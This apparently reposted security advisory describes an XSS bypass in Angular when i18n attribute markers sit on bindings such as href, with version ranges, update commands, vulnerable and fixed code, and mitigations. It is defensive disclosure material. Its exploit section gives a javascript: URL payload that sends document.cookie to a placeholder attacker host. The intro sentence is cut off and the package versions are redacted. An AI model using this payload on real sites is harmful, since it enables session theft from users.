Listen to this Post
A Cross-Site Scripting (XSS) vulnerability exists in the Angular runtime and compiler when an application uses a security-sensitive attribute (like href) together with Angular’s internationalization (i18n) feature. Adding an `i18n-
dailycve form:
Platform: Angular
Version: <22.0.0-next.3, <21.2.4, <20.3.18, <19.2.20
Vulnerability :XSS i18n bypass
Severity: High (CVSS:4.0 8.6)
date: 2026-03-13
Prediction: Patched versions already available
What Undercode Say:
Analytics
The vulnerability impacts all Angular applications using i18n attribute bindings with unsanitized user input. Attackers can exploit this remotely (AV:N) with low attack complexity (AC:L) and no privileges required (PR:N), though user interaction is needed (UI:P) . Successful exploitation yields high confidentiality and integrity impact (VC:H/VI:H) .
Bash Commands
Check Angular version in your project grep '"@angular/core"' package.json Update to patched version npm install @angular/[email protected] --save Or for specific major versions npm install @angular/[email protected] --save npm install @angular/[email protected] --save npm install @angular/[email protected] --save Verify update npm list @angular/core
Code Examples (Vulnerable vs Fixed)
Vulnerable Code:
@Component({
template: `<a href="{{userProvidedUrl}}" i18n-href>Link</a>`
})
export class AppComponent {
userProvidedUrl = 'javascript:alert("XSS")';
}
Fixed Code using DomSanitizer :
import {Component, inject} from '@angular/core';
import {DomSanitizer, SecurityContext} from '@angular/platform-browser';
@Component({
template: `<a href="{{safeUrl}}" i18n-href>Safe Link</a>`
})
export class AppComponent {
private sanitizer = inject(DomSanitizer);
safeUrl: string;
constructor() {
const dangerousUrl = 'javascript:alert("XSS")';
this.safeUrl = this.sanitizer.sanitize(SecurityContext.URL, dangerousUrl) || '';
}
}
How Exploit
- Attacker identifies an Angular app with i18n attribute binding
2. Finds element using vulnerable attribute with `i18n-`
3. Injects malicious payload through user-controllable input
- Payload bypasses sanitization due to i18n attribute presence
- Example malicious URL: `javascript:document.location=’http://attacker.com/?cookie=’+document.cookie`
Protection from this CVE
- Update Angular to patched versions: 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20
- Use DomSanitizer to sanitize any user input bound to vulnerable attributes
- Never trust user input bound to security-sensitive attributes with i18n
- Implement Content Security Policy (CSP) to restrict script execution
- Enable Trusted Types to enforce proper HTML sanitization
- Audit code for `i18n-` attributes on elements with dynamic bindings
Impact
- Session Hijacking: Stealing session cookies and authentication tokens
- Data Exfiltration: Capturing sensitive user data from the page
- Unauthorized Actions: Performing actions on behalf of the user
- Page Vandalism: Mutating page content to mislead users
- Credential Theft: Accessing LocalStorage, IndexedDB, or cookies
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

